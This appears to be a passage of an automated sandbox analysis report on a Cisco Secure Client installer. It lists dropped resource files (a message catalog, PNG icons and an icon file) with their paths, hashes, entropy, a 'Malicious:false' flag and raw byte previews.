                                                                                                                                      SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                      MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                      SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                      SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                      SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\zh-tw\LC_MESSAGES\is-QB93J.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313017
                                                                                                                                      Entropy (8bit):6.23496399047262
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                      MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                      SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                      SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                      SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\ArrowDown.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3882
                                                                                                                                      Entropy (8bit):6.743390042757195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                      MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                      SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                      SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                      SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\ArrowDownDisabled.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3884
                                                                                                                                      Entropy (8bit):6.749338244156901
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                      MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                      SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                      SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                      SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\ArrowUp.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3880
                                                                                                                                      Entropy (8bit):6.742220289284142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                      MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                      SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                      SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                      SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\ArrowUpDisabled.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3881
                                                                                                                                      Entropy (8bit):6.749191813135782
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                      MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                      SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                      SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                      SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\GUI.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):431993
                                                                                                                                      Entropy (8bit):4.565786626694248
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                      MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                      SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                      SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                      SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:............ ............... ............... .^N............ .(R............ .(...!S..``.... .....I[..@@.... .(B......00.... ..%...2..((.... .h....W.. .... .....)r........ .............. .....Y......... .h........PNG........IHDR.....................pHYs..........o.d.. .IDATx...wtUU....MO..B....TA.. ...l....Ti"H.E...D@lT.EA.).... ........R...{o...Jd..o.L...},.RJ9.1.......#W..` (.#.._.....?>|..ki@j.G..........q..........2>....( ......RJ)u.,..J).2..a@^ <....C..?;..}9..f..p....|..#,.J...Rn.]..(.T.3.x....@..|.D..vu.N....W.|D.....y..(..5.c, ..^..!}.....Np...eY)B.R...PJy<cL(P9."._.............^...W....RJ)G..@).1.1.@9...U2>*..UGy.(2......,..M..R6..@).1..r._....dH.S.WC.Ws.eYi...R*+h...ri..?.j.........[..vsyc.eY...R..i...r).....wd|.B..+.....M.F`.eY.e#)....@).h.R..._..=...K9.q....>v..".....Q..cdl.....w.~Q.R.$.......t.R.I..PJ...<.C.}..&....M...h..(.l.1.....J..!...2>.Y.uA8.R...^.T.2...........H).I...V..,..!.G)...PJe..}....S.....r9'.....e....r3..(.n.1.8......M

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\about.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1807
                                                                                                                                      Entropy (8bit):7.846793911413473
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                      MD5:536C911881523B9F8402A481881992A0
                                                                                                                                      SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                      SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                      SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..;R#I..k.........1...h.@'..:.V...1'.q..kM...Ly..h..6J.=....Y.%E~...!..wVe... .. .. .. ....O;....I..UO...........R.........7...E)5W.d...Q.)J5.7\{....Q.W.P.R.a.@.*K......ab...Q.d..zV....^..m.C.t..U.Y.e..(.....x.J)...s.....)..XM....Y.._~Q......o#..........=.p+b.E..X..X.}.'..o...DJw..GJq.].^.%R.#..3.y<.s...5.......s.s....;>.Z.q.F./..r.Z...T..=.&H......z...~J/.%.....(.~.|R7...z.LV....+.........T....|L.1i<..Zc.]LO.;.@.:.?IU./..A.,.-.rGr!Z...'I.........6+^......a....n6~e6ejy.f.........\UC..\..i..s.r.U_.i..>......u...p...zb5..t|u.h.*gxD..}6T[i.jxO./..goc...9......(.[..........*.{.8.f.(..R..J8.za.;.t..aj./.5.^px....g[...]z...=.Q.Q.%.D...z2`.;.6.K9.26Tc'....)_...$..<.&.7v.....pQ..N....s.c...XX..x.>..O.....)&/IYm..=....7.A.......c$..R....T{.q......C..@.L.....]({..>y.:.e.#....ym.....g^.R.....v.$.M.B.E....^.xSF80......n|Ph./..%<.I...X.f..=.pz..~...a..O1.9g.m.Mp....n.v%D....w....F6.....{.".!.~.}..}.P.S.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\about_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388
                                                                                                                                      Entropy (8bit):7.139959170245274
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                      MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                      SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                      SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                      SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....6IDATH...M.0.E.L....&hG..t...f.........F`.l..}n.....B..).....}.p.k....x..3n|oI.^..G._~%..3...7~.^...#D..]/.lD.....{...#..:...k..+n.U.....)".]'g...9Y...G.w^v.&.FX{....".i.k.:..bN.......b.(H......8.y. .E...s$.V.....U.sOwFo.#...a;:....2.....=.....P...ct.k.A..-....Q...<..R...$.FX.-M......k.W...b.}2o.....p.........IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\about_hover.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1916
                                                                                                                                      Entropy (8bit):7.856747119568193
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                      MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                      SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                      SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                      SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]=r[7.....eJ.Kg.M#..~>...H.. ..8.O .L.....T.......p.&.....P.7.G....a..X,...........m..}7:...9...o.u.7.9.,....3...>.x...^R...........y...F.."eC....dzk...5.T.).hHD.US)L.`..x^..eIA2~...`..W.g%.T..ndT.u.d..r.[r.6.6PM.=...|....<..9..j.$'...GJ7.J...s..........<..3...Ip.C..'.....9.....G.H..C.'..n.._&i.!-)....v......'M..p..=M........=..4R...7.$b.;.iH..9.Q.....]P.%.OBL|R.............j.T....Lc.:.):B....f5P.]+..c.>.....!.Tz8.P.N.#..@nw0.H....$.:{...K.. .%......xG...3...OA..,.9..u.b.....<....v.H./.....k~.o...8.%.'.....w.'.'.%....!t.{........).oL...y?_~...K....>j.....]3.%...$.Cr@....l+.`...Y..._0v.4.s...@3._...]{n..)...wRpO....%.w..h2.....v...p/.}..#j.@.d.t.F.HA)..`).r<.....'...cq..WI..>...qy.......h........MJ..B(W. @....\1.SK...pz.kL......2{"hF...H..'.m"........K..2...).3a.....5.NR.an.\}.t6..is0T.&....2...6..H..U_6..E....$g...S..Nm..d+qp/dI......r.b....>....q/.8Qm..I.......%.P......I...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\about_hover_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):421
                                                                                                                                      Entropy (8bit):7.268682924293009
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                      MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                      SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                      SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                      SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....WIDATH..U.m.0..".`...n@&..N.J..e.Ke.t.....x.2.#T.v...Z=)R..w.>.3r..*~.....k.k.).q....^.....`.k..'.tG.......X.:Kf..=..7-........Md..`.....L.H.{..K.%D.~.i.$.F..z....*]Q....Y@.f..D...C|j.!\gi...q..R.1...2..K.....=..,..%...p+.(iW....#......r....N...=........C.8[..\<.a....2[n....B, #...u.09......a...;........._U.)K2...pb.LW...~^.......hSX.....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\amp_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12558
                                                                                                                                      Entropy (8bit):7.968059020803266
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                      MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                      SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                      SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                      SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U...hr!#.D'..i.L.$.l..V...q+.....H..l,.h...T.v.Ui..@..,.....Y.*.1.i........BX%:..4.n.O../..y....s.s....{.}.....>.}.a|R(.!.!e....|.:..Y.Jm..g...E.....S#>...R....0..[Dt.....R...i1,Z9BDJ5B...b49e....b..Z.`..(B.lq..Bq...!b.#Zc!..,Z..P..,....R:S.#.MDe{.Jm..|.L9,Z).B...E....Y......xX..E+%..|..M."eD$u...z.y...}..H.' ..Z.....X...P...Buk..P."d.9x ......uq..;t..q....Q.y...=..'rv......h.F.B5...h.%....K...>...@........7i.....8t8..e.3..-.(K....*DF..+F..>.4nTZ.&G \.......[.G.......|3`.J.a.#....* J..&..e|....x...g}..L...VA...O.....Q.\.U..{.He-...Dkk.NK..w..N~.z.'./N.c.E+&D..B.....~...4nt.#)U.}ml.fEc.|....Z.....,Z.S(...)`.Z*.U}...5}....cGa[_....z...8u......bu_....*~.6ni.Ak..D`..ul.G...F._.("..b.ToZ.D.7g:.U.....L..x=....-.....0...fN.J...j...=.. ^..B..,^.a.RD..+....*...*..........}.xi.E+$a=+...n.*...G...uG..rB.z.a........A+...`6.Re.D\..B..'D....0(,Z>.=.+E..o.....l..Z......T..*6..B..hyPf.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\amp_logo_72.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2860
                                                                                                                                      Entropy (8bit):7.914852791051157
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                      MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                      SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                      SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                      SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\.L......E.ki....`S.uB&HRP......E7.5.f.K.t.e....lV..ve.M'..@..."..t).U.R.(r@I....^.......;...._B.......w..{..y...Q.a.df......G3.T......&.....`.q..2Z2..h3...Q.....d..*q..b..?.9}......6...I5DT.7u....B..i...._.........\.>..........U..r.=.]....rb. !'{-m...DO..N.\....,.'.TO.t!..X...(';]......KT.N.pE]..1AFK&\.(.%.....!iK...^;V%..6.u..CB...Jh.\....f1...*.........&..2Z2!..`5.r7.+.wSlL....?.......N..@..8.M6..2h=.h..ID.bc...YRD?}....4...O.=.O..I+.....sd..d.=.o.D.&.89...WD.,=H..)z.'`...xZ.n...vD....l0Ynj!.g...C.9qd..7.....D..M:..y>Y......9.I..i.$..=....C.G..lu.....L..u.`..b.{=>Xp#).`....o.]^U.x.s56&:....*..w..rI0W'...C{uO7f.h.4i`p.!..jqR..k .L.:0\.=.n.7#K0C.U.K...X...b<}x.A .._....?.*.=..a.n....o..v=.N..9jQ.C.....kJ2.,....?v?f.A.../^h.,=.).Df.P..p....$..{Dz...C:v..t.......[G.a..>3.R...=..Z....X....}%.CV...J....p.6<......}v....T..3.5._].....c.V.~..A.z.....x./^..q....?.......9 ....5.?.Xy...s ..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\app_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):51094
                                                                                                                                      Entropy (8bit):7.977081753425093
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                      MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                      SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                      SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                      SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                      Malicious:false
